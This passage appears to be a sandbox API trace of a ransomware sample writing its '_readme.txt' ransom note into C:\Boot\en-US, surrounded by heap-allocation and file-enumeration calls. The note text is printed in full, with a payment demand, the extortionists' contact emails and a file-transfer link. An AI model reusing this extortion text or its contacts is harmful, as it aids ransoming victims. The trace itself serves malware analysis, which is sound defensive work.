dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.449] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0174.449] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.449] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.450] PathFindFileNameW (pszPath="") returned="" [0174.450] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.450] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.450] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.450] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.451] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0174.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.451] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0174.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.452] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.453] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.453] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.454] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.455] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.455] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.455] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0174.455] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0174.455] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.456] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 